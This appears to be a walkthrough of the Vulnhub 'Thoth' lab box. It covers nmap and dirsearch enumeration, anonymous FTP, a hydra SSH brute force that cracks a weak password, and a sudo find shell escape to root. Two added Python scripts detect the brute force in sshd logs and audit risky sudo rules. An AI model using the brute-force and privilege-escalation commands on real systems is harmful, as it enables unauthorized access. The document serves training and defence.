
Vulnhub-Thoth

Vulnhub-Thoth box walkthrough

Port scanning / information gathering

┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.240.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 11:38 CST
Nmap scan report for bogon (192.168.240.46)
Host is up (0.00039s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: FA:DB:E5:E9:94:F7 (Unknown)

Nmap scan report for bogon (192.168.240.52)
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
8081/tcp filtered blackice-icecap
MAC Address: 3A:ED:9D:97:DA:7E (Unknown)

Nmap scan report for bogon (192.168.240.82)
Host is up (0.00020s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
5001/tcp open commplex-link
7000/tcp open afs3-fileserver
MAC Address: 3A:03:50:5A:8C:DF (Unknown)

Nmap scan report for bogon (192.168.240.83)
Host is up (0.0000040s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 5.36 seconds

The target has ssh, http and ftp open, and the http service only serves the Apache default page.
Check whether the FTP service allows anonymous login.
It does, and there is a note.txt in it, which suggests FTP is the intended way in.
Use get to download the file locally and see what it contains.

┌──(root㉿kakeru)-[~/tmp]
└─# cat note.txt
Dear pwnlab,

My name is jake. Your password is very weak and easily crackable, I think change your password.

The hint: there is a user named pwnlab, and their password is weak.

Web enumeration

Run a directory scan.

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u http://192.168.240.46
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/http_192.168.240.46/_25-02-03_13-04-19.txt

Target: http://192.168.240.46/

[13:04:19] Starting:
[13:04:19] 403 - 279B - /.ht_wsr.txt
[13:04:19] 403 - 279B - /.htaccess.bak1
[13:04:19] 403 - 279B - /.htaccess.orig
[13:04:19] 403 - 279B - /.htaccess.save
[13:04:19] 403 - 279B - /.htaccess_extra
[13:04:19] 403 - 279B - /.htaccess.sample
[13:04:19] 403 - 279B - /.htaccessOLD2
[13:04:19] 403 - 279B - /.htaccess_orig
[13:04:19] 403 - 279B - /.htaccess_sc
[13:04:19] 403 - 279B - /.htaccessBAK
[13:04:19] 403 - 279B - /.htaccessOLD
[13:04:19] 403 - 279B - /.html
[13:04:19] 403 - 279B - /.htm
[13:04:19] 403 - 279B - /.htpasswd_test
[13:04:19] 403 - 279B - /.httr-oauth
[13:04:19] 403 - 279B - /.htpasswds
[13:04:20] 403 - 279B - /.php
[13:04:31] 403 - 279B - /server-status
[13:04:31] 403 - 279B - /server-status/
[13:04:32] 200 - 7B - /test.php
[13:04:42] 301 - 0B - /wordpress/ -> http://192.168.1.8/wordpress/
[13:04:42] 200 - 2KB - /wordpress/wp-login.php

Three hits.
test.php contains nothing useful; there is also a login page.
I tried brute-forcing it with Burp using the username found earlier, but the login page throws an error as soon as the form is submitted.
wpscan turns up nothing either.
Since the note said pwnlab's password is weak, brute-force SSH with hydra instead.

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.240.46:22 -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-03 13:13:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://192.168.240.46:22/
[STATUS] 165.00 tries/min, 165 tries in 00:01h, 14344234 to do in 1448:55h, 10 active
[22][ssh] host: 192.168.240.46 login: pwnlab password: babygirl1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-03 13:15:39

Got a shell.
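From the defender's side, the hydra run above leaves a very recognisable trace in the sshd log: a burst of failed password attempts from one address within a short window, then a successful login from the same address. The Python script below is an added example and is not part of the original writeup. It parses constructed sshd log lines (syslog/auth.log format, modelled on the timestamps above, not captured from the box), flags the burst and the success that follows it, and deliberately ignores an isolated failure followed by a success, which is what a mistyped password looks like. The year is an assumption because syslog timestamps carry none.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd log lines in syslog/auth.log format; they mimic the
# pattern a password-guessing run leaves behind and are NOT captured from the box.
SAMPLE_LOG = """\
Feb  3 13:13:57 thothtech sshd[1201]: Failed password for pwnlab from 192.168.240.1 port 51234 ssh2
Feb  3 13:13:58 thothtech sshd[1203]: Failed password for pwnlab from 192.168.240.1 port 51236 ssh2
Feb  3 13:13:58 thothtech sshd[1205]: Failed password for invalid user admin from 192.168.240.1 port 51238 ssh2
Feb  3 13:13:59 thothtech sshd[1207]: Failed password for pwnlab from 192.168.240.1 port 51240 ssh2
Feb  3 13:14:00 thothtech sshd[1209]: Failed password for pwnlab from 192.168.240.1 port 51242 ssh2
Feb  3 13:14:01 thothtech sshd[1211]: Failed password for pwnlab from 192.168.240.1 port 51244 ssh2
Feb  3 13:15:39 thothtech sshd[1320]: Accepted password for pwnlab from 192.168.240.1 port 51299 ssh2
Feb  3 13:20:00 thothtech sshd[1400]: Failed password for jake from 192.168.240.52 port 40000 ssh2
Feb  3 13:25:00 thothtech sshd[1410]: Accepted publickey for jake from 192.168.240.52 port 40002 ssh2
"""

# Matches both "Failed password for USER" and "Failed password for invalid user USER".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line, year=2025):
    """Return a dict for an sshd auth event, or None for unrelated lines.
    syslog timestamps carry no year, so the caller supplies one (assumed 2025 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def find_bruteforce(lines, threshold=5, window=timedelta(minutes=1),
                    lookback=timedelta(minutes=10)):
    """Flag (a) >= threshold failures from one IP inside `window` and
    (b) a successful login from an IP that had >= threshold failures within `lookback`.
    Returns a list of (kind, ip, user, timestamp) tuples."""
    failures = defaultdict(deque)  # ip -> timestamps of its failed attempts
    flagged = set()                # IPs already reported for a burst
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = failures[ev["ip"]]
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            # keep only failures inside the sliding window
            while q and ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append(("burst", ev["ip"], ev["user"], ev["ts"]))
        else:
            # a success counts only when it follows a real burst, not a single typo
            recent = [t for t in q if ev["ts"] - t <= lookback]
            if len(recent) >= threshold:
                alerts.append(("success_after_burst", ev["ip"], ev["user"], ev["ts"]))
    return alerts


if __name__ == "__main__":
    for kind, ip, user, ts in find_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{ts:%H:%M:%S} {kind:<20} ip={ip} user={user}")
```

On a real host the same logic can be fed from /var/log/auth.log or `journalctl -u ssh`; the `success_after_burst` alert is the one worth paging on, since it means a guessed password actually worked. Rate limiting with fail2ban or disabling password authentication in sshd_config removes the class of problem entirely.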

Privilege escalation

pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find

pwnlab can run find with sudo.
Look up the privilege-escalation technique for find:

sudo find . -exec /bin/sh \; -quit

-quit makes find exit as soon as the first match has been handled. Because -exec is evaluated before -quit, find spawns exactly one shell (for the first entry it visits) and stops, instead of starting a new shell for every file under . after each one exits.

Got root.

pwnlab@thothtech:~$ sudo find . -exec /bin/bash \; -quit
root@thothtech:/home/pwnlab#
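A quick way to catch this class of misconfiguration before it is used is to audit `sudo -l` output for rules that hand root (or ALL) to a binary whose ordinary options already run other commands, which is exactly what find's -exec does above. The Python script below is an added example, not from the original writeup. The sample `sudo -l` text is constructed in the format the box printed, and the `SHELL_CAPABLE` set is an illustrative assumption that should be extended from a maintained reference such as GTFOBins rather than treated as complete.

```python
import os
import re

# Constructed `sudo -l` output in the format the box printed; not captured from it.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl restart apache2
    (root) /usr/bin/find /var/log -name *.log
    (www-data) NOPASSWD: /usr/bin/find
"""

# Illustrative (assumed, not exhaustive) set of binaries whose normal options let the
# caller run other commands or drop to a shell, e.g. find -exec, awk system(), vim :!.
# Extend from a maintained reference such as GTFOBins.
SHELL_CAPABLE = {"find", "awk", "vim", "vi", "less", "more", "perl", "python3", "bash", "sh"}

# One sudo -l rule line: "(runas[ : group]) [TAG: ...] cmd[, cmd...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_rules(text):
    """Yield (runas_user, nopasswd, command_string) for each command in sudo -l output."""
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in m["cmds"].split(", "):
            cmd = cmd.strip()
            if cmd:
                yield runas, nopasswd, cmd


def audit_sudo_l(text):
    """Return findings for rules that give root (or ALL) to a shell-capable binary."""
    findings = []
    for runas, nopasswd, cmd in parse_rules(text):
        parts = cmd.split()
        binary = os.path.basename(parts[0])
        args = parts[1:]
        if runas not in ("root", "ALL"):
            continue  # rules for unprivileged run-as users are out of scope here
        if binary == "ALL":
            reason = "any command allowed"
        elif binary not in SHELL_CAPABLE:
            continue
        elif not args:
            reason = "no arguments pinned: caller controls the full command line"
        elif any("*" in a or "?" in a for a in args):
            # sudoers wildcards match any characters, spaces included, so a pinned
            # argument list containing one does not actually constrain what runs
            reason = "wildcard in pinned arguments"
        else:
            continue  # exact argument list without wildcards; not flagged here
        findings.append({"runas": runas, "nopasswd": nopasswd, "binary": binary,
                         "command": cmd, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"[{tag}] ({f['runas']}) {f['command']}: {f['reason']}")
```

Run it against `sudo -l -U <user>` output on each host as part of a periodic check. sudoers can pin the exact argument list after the command path, but because `*` and `?` match across argument boundaries, a rule like the third sample line is flagged at the same severity as one with no arguments at all; the fix is a rule with a fixed, wildcard-free argument list, or a small wrapper script that hard-codes the find invocation.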

A very simple box; it really is well suited to beginners.